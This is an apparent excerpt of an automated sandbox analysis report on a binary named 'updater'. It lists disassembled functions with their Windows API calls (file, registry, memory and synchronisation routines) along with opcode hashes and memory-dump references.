Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

~\AJ[MZ`OCK., xrefs: 013D2A85

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_strlen$ConditionVariableWake
String ID: ~\AJ[MZ`OCK.
API String ID: 2310394193-2575923559
Opcode ID: 7a24994672d4262f852681991c173fa9bd336bccc98b569ca5fd77c116d55b0e
Instruction ID: 6348c5c7cc4dae1f44636ef67658d3994a27a364e6e9c5f8055d1dd42df247b3
Opcode Fuzzy Hash: 7a24994672d4262f852681991c173fa9bd336bccc98b569ca5fd77c116d55b0e
Instruction Fuzzy Hash: EC412572D04286CFEF15EFB8E4447AEBBB4AF26218F14004EC0416B1A2DBB85946C793

Uniqueness

Uniqueness Score: -1.00%

Function 0143201C Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 014317B1: GetConsoleCP.KERNEL32 ref: 014317F9

WriteFile.KERNEL32(?,00000001,00000000,014602C0,00000000), ref: 0143216D
GetLastError.KERNEL32(?,00000000,00000001), ref: 01432177
__dosmaperr.LIBCMT ref: 014321BC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID:
API String ID: 251514795-0
Opcode ID: e6d3e4b52a0fe49e5756725ebd07d1b0066c54740dc2bba3df34864c7ae76cfb
Instruction ID: 60eef0bef86f78e66d3197542b3dea0bf2a2ecffa7ebaf05d438c3400b2de70d
Opcode Fuzzy Hash: e6d3e4b52a0fe49e5756725ebd07d1b0066c54740dc2bba3df34864c7ae76cfb
Instruction Fuzzy Hash: E451C175A0011AABEF11DFA9C984FEEBBB9BF9D314F040017D600A7271D6B49946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014387FD Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 01438806
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01438874

Part of subcall function 0143749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0143165F,?,00000000,00000000), ref: 0143753D

Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E

_free.LIBCMT ref: 01438865

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 9533aa77d0a264df2424715c1191981ec803438ddf821de443a685580c47bfa5
Instruction ID: 5df6729d5defe341890a3579b7c97308e8edfd1163a2b5a5ff7484387b020d37
Opcode Fuzzy Hash: 9533aa77d0a264df2424715c1191981ec803438ddf821de443a685580c47bfa5
Instruction Fuzzy Hash: 860188A29012137F7735557B2C88C7BBD6DDEEED91314062ABA05D6224EB75CD0281B0

Uniqueness

Uniqueness Score: -1.00%

Function 014310E3 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 01431139
GetLastError.KERNEL32(?,01431011,?,01460260,0000000C,014310C3,?,?,?), ref: 01431143
__dosmaperr.LIBCMT ref: 0143116E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 973702fd800de89096df7b79e1aa73d034972487bc5a8006f32e35df056ab32e
Instruction ID: 4480b5d8583cc1d479883eb5eb289e23e56550220c4026b16a1969bd5ff139d9
Opcode Fuzzy Hash: 973702fd800de89096df7b79e1aa73d034972487bc5a8006f32e35df056ab32e
Instruction Fuzzy Hash: 0601083270012016EE35223DE8497AFA76A4BEEF38F29055FE914973F2DF7088864290

Uniqueness

Uniqueness Score: -1.00%

Function 013E3154 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 013E3173
GetLastError.KERNEL32 ref: 013E317E
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 013E31A0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: File$ErrorLastPointerRead
String ID:
API String ID: 64821003-0
Opcode ID: 4686fe8dccf0d59c453adf66701bfe98d44a1e53063f3eb2e2c04182452c6b81
Instruction ID: 39297113302bb6bdfe5244ddd93d6df5e35b4aad8aa435f7ab75c9c91e4d567a
Opcode Fuzzy Hash: 4686fe8dccf0d59c453adf66701bfe98d44a1e53063f3eb2e2c04182452c6b81
Instruction Fuzzy Hash: 6C015332300329FBDB219EA9DC49F9A3BFCEB053A5F504529FA15DB2D0D670D9408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 013C774B Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 013C777E
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,05F5E100), ref: 013C779B
CloseHandle.KERNEL32(?), ref: 013C77AB

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleMappingView
String ID:
API String ID: 1187395538-0
Opcode ID: 9a3095dead2dce007d8c63f70aa3a12a13c38998413bfb3f376830242caca61f
Instruction ID: 22230842bb5cb0e74e09a15af4b556681ce60c00e2429d9d49532375707a0ffe
Opcode Fuzzy Hash: 9a3095dead2dce007d8c63f70aa3a12a13c38998413bfb3f376830242caca61f
Instruction Fuzzy Hash: 2C116974900F08DFD7338B1A8844E33BBECEB99F69B10855EE99681591D3709840CF10

Uniqueness

Uniqueness Score: -1.00%

Function 013C7939 Relevance: 4.5, APIs: 3, Instructions: 33fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,?,003B5C28,?,013C84B6), ref: 013C795E
CloseHandle.KERNEL32(00000000), ref: 013C7971
CloseHandle.KERNEL32(00000000), ref: 013C798A

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 289adc08a288ed5021578e84c5815b1a115b2386675936b348c84054a4db29b6
Instruction ID: 0352618cc03cd50aa1681baaffc879e0dc7a863a8d8a38d5fc3753e2bf9054d7
Opcode Fuzzy Hash: 289adc08a288ed5021578e84c5815b1a115b2386675936b348c84054a4db29b6
Instruction Fuzzy Hash: DD011931001B408FE7329B79C44C7A2BBE0AB0571EF04C96DE1EA419A0C3B9A888CF44

Uniqueness

Uniqueness Score: -1.00%

Function 013C4699 Relevance: 4.5, APIs: 3, Instructions: 16COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000004,00000004,00000000,013C4737,?,?,?,?,?,013C46CC), ref: 013C46A1
GdiplusShutdown.GDIPLUS(00000000,?,?,?,?,?,013C46CC), ref: 013C46AE
LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013C46CC), ref: 013C46B8

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterGdiplusLeaveShutdown
String ID:
API String ID: 3929762956-0
Opcode ID: 667a8a98afedc2052cf96ddd4647205b9b32c1e780354e6ba8a268134f44153c
Instruction ID: 0dcc423e902d67ba1b63a7720654cea70bb6b5fa4991bac3214ff9a3aa2dcfe9
Opcode Fuzzy Hash: 667a8a98afedc2052cf96ddd4647205b9b32c1e780354e6ba8a268134f44153c
Instruction Fuzzy Hash: D6D09E7E001110DBD7321F18F8087EA77F9EB85727F11491DF58191068D7B51897DB64

Uniqueness

Uniqueness Score: -1.00%

Function 014381CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 01438201

Strings

, xrefs: 01438246

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: d7b253201f9bc804d01d1093e052840774eead2347346aeb722ea56952f445c3
Instruction ID: f7abe8981d6e3bda71a3424d7b2081f6ff1ab7057f4e4c5b36d2f9b65562e76c
Opcode Fuzzy Hash: d7b253201f9bc804d01d1093e052840774eead2347346aeb722ea56952f445c3
Instruction Fuzzy Hash: 54416D705046499FD7218B58CD84FFBFBFDAB99304F1405AEF5CA87262D2719945CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0142FE67 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0142FEA7

Strings

InitializeCriticalSectionEx, xrefs: 0142FE77

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 4f217f92bf429433c01cbcedbac9287b8c1e7f5684a81005644afcd7bdf70602
Instruction ID: daa6e7c85eed3dd5fd2fe1d027f6a94c811897fb2c5077fff88d9a80f255c698
Opcode Fuzzy Hash: 4f217f92bf429433c01cbcedbac9287b8c1e7f5684a81005644afcd7bdf70602
Instruction Fuzzy Hash: 8BE09235581228BBDF222FD2DC05D9E3F26EB20BB1B404016FD0925130CB7249629BC0

Uniqueness

Uniqueness Score: -1.00%

Function 0142FC12 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0142FC46

Strings

FlsAlloc, xrefs: 0142FC22

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: ebe08f52e5de83b3393d3afe2794d9e4c0855412b60212c43cdc8c17f3e7e23c
Instruction ID: fe375132e6200162875e4e340703efc755d45b578d538209bbd4e9fa28597322
Opcode Fuzzy Hash: ebe08f52e5de83b3393d3afe2794d9e4c0855412b60212c43cdc8c17f3e7e23c
Instruction Fuzzy Hash: 55E0C235A8123473E3213793AC06D5E7D16AB70AA2F954017FD08922348AB1094646D1

Uniqueness

Uniqueness Score: -1.00%

Function 01438564 Relevance: 3.2, APIs: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 014380F9: GetOEMCP.KERNEL32(00000000,0143836B,?,?,01423E8D,01423E8D,?), ref: 01438124

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,014383B2,?,00000000,?,?,?,?,?,?,01423E8D), ref: 014385C2
GetCPInfo.KERNEL32(00000000,014383B2,?,?,014383B2,?,00000000,?,?,?,?,?,?,01423E8D,?), ref: 01438604

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 0c03679118ef97331dc44351b43da3c6150106178cc3b685e7c2e672887a32a5
Instruction ID: 3998cf8114385706d0027a600578747c65c05081d94fb84a8196c0a686929089
Opcode Fuzzy Hash: 0c03679118ef97331dc44351b43da3c6150106178cc3b685e7c2e672887a32a5
Instruction Fuzzy Hash: 045125709002479FEB218F6AC8506BBFBF5EFD8204F14462FE18A87271D7749546CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01438350 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 014380F9: GetOEMCP.KERNEL32(00000000,0143836B,?,?,01423E8D,01423E8D,?), ref: 01438124

_free.LIBCMT ref: 014383C8

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dfe47748fc5b1cebd681ec4e32f9aeed3cbe3ac33f29815161c4a9a2523c44d5
Instruction ID: b8f4562ee589802fa224cc19af040d8318763125380e29df7008ead47ac8185b
Opcode Fuzzy Hash: dfe47748fc5b1cebd681ec4e32f9aeed3cbe3ac33f29815161c4a9a2523c44d5
Instruction Fuzzy Hash: EC31707190024AAFDB11DF69D840A9FBBB4AF98314F11426BF911973B1EB72D950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013E35EE Relevance: 3.1, APIs: 2, Instructions: 92fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013E2F5C: GetVersionExA.KERNEL32(?), ref: 013E2F80

CreateFileW.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013E366D
CreateFileA.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013E3675

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CreateFile$Version
String ID:
API String ID: 1715692615-0
Opcode ID: 7628dd9b71ad52020161654a9a197ba3300cd69aea80264048e90bee5e5ccda1
Instruction ID: 610ab4c1e722bdcafef08e39da10608dc374bd1484d9791ca8378365fe3b0150
Opcode Fuzzy Hash: 7628dd9b71ad52020161654a9a197ba3300cd69aea80264048e90bee5e5ccda1
Instruction Fuzzy Hash: DF21F272A00325ABEB209F788C45BAE7BF4BF44228F144529E965EB3C0DB7488408B50

Uniqueness

Uniqueness Score: -1.00%

Function 013C2BF0 Relevance: 3.1, APIs: 2, Instructions: 70COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_open@12.LIBCPMT ref: 013C2C5F
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2C73

Part of subcall function 014060E6: FindNextFileW.KERNEL32(?,?,?,013C2C78,?,?,?,?,?,?,?,?,00000000), ref: 014060EF

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID:
API String ID: 1204997319-0
Opcode ID: 025c1b87d7338fb4990cccebd282c0eb9b4c13ea38c8496a1ca4fd7cb7933e2a
Instruction ID: b56faad64e4c3c03b1ef3234d9fff514f15cd041c817c915b374052b81bc0223
Opcode Fuzzy Hash: 025c1b87d7338fb4990cccebd282c0eb9b4c13ea38c8496a1ca4fd7cb7933e2a
Instruction Fuzzy Hash: C121E471610616EBDF15AF98D980ADF77B4AF14B18F00841EEC02A7191D770DD809B50

Uniqueness

Uniqueness Score: -1.00%

Function 013DBB72 Relevance: 3.1, APIs: 2, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,00000000), ref: 013DBBCB
RegGetValueA.KERNEL32(?,00000000,?,00000002,00000000,00000000,00000100,?,?,00000000,00020019,?,?,?,00000000), ref: 013DBBF1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: OpenValue
String ID:
API String ID: 3130442925-0
Opcode ID: a4114137676e494545ba4f8b5eb979bdd9c807181b455980f06885c00714c631
Instruction ID: 1cf3f8117fcc7398d0d63f0b42422320903e437b1188a598a25cd0166646a495
Opcode Fuzzy Hash: a4114137676e494545ba4f8b5eb979bdd9c807181b455980f06885c00714c631
Instruction Fuzzy Hash: 96218E7260020AABEF24DF58D881BEEB7BCEB94708F11412EF902A71D5D7B09948CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013C799D Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013C79E0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f01b0073652bf58f9423f6c07ed3d1a4818311a201e695573e754f70cb4c826e
Instruction ID: 168ad1953c300266bf0765de4b39699b4e40de778465f32186179454a2c2ccf8
Opcode Fuzzy Hash: f01b0073652bf58f9423f6c07ed3d1a4818311a201e695573e754f70cb4c826e
Instruction Fuzzy Hash: 82018F75604B44AFF322CB7C8844BB6BAECEB14A14F00493EFAA6D3351E7B09D409B10

Uniqueness

Uniqueness Score: -1.00%

Function 01430E65 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01430E86

Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E

RtlReAllocateHeap.NTDLL(00000000,00000000,013C2742,?,00000000,?,01422F1A,00000000,?,?,?,00000000,?,013DF38B), ref: 01430EC2

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 778808b725e9a01d383cb788a8b203dfa61a773114d9627bdd457500ca5a6dd8
Instruction ID: 92163572d07e9e89d5c042db9931854f0d00012c474da09dffb196b28a775927
Opcode Fuzzy Hash: 778808b725e9a01d383cb788a8b203dfa61a773114d9627bdd457500ca5a6dd8
Instruction Fuzzy Hash: 3FF09C32301216669B312A3B9C01F5F77589FD9971B55031BF914573B0DB34C542C5B1

Uniqueness

Uniqueness Score: -1.00%

Function 01406087 Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 01406094
GetLastError.KERNEL32 ref: 014060A7

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3a73f421243442d540818bd6fc284d428adecd58b942c22681a63c3d27c648e6
Instruction ID: 457b5bf2bf3b3ebf2f89a97b14962960efb59255b2ad5f6af9462bb21bc1fd4e
Opcode Fuzzy Hash: 3a73f421243442d540818bd6fc284d428adecd58b942c22681a63c3d27c648e6
Instruction Fuzzy Hash: 36F0F670B40118ABDB13CA5DC980ADF7ABE9B54258F108136E902A63E5DB71D8628390

Uniqueness

Uniqueness Score: -1.00%

Function 0142D57C Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0142D5C4

Memory Dump Source

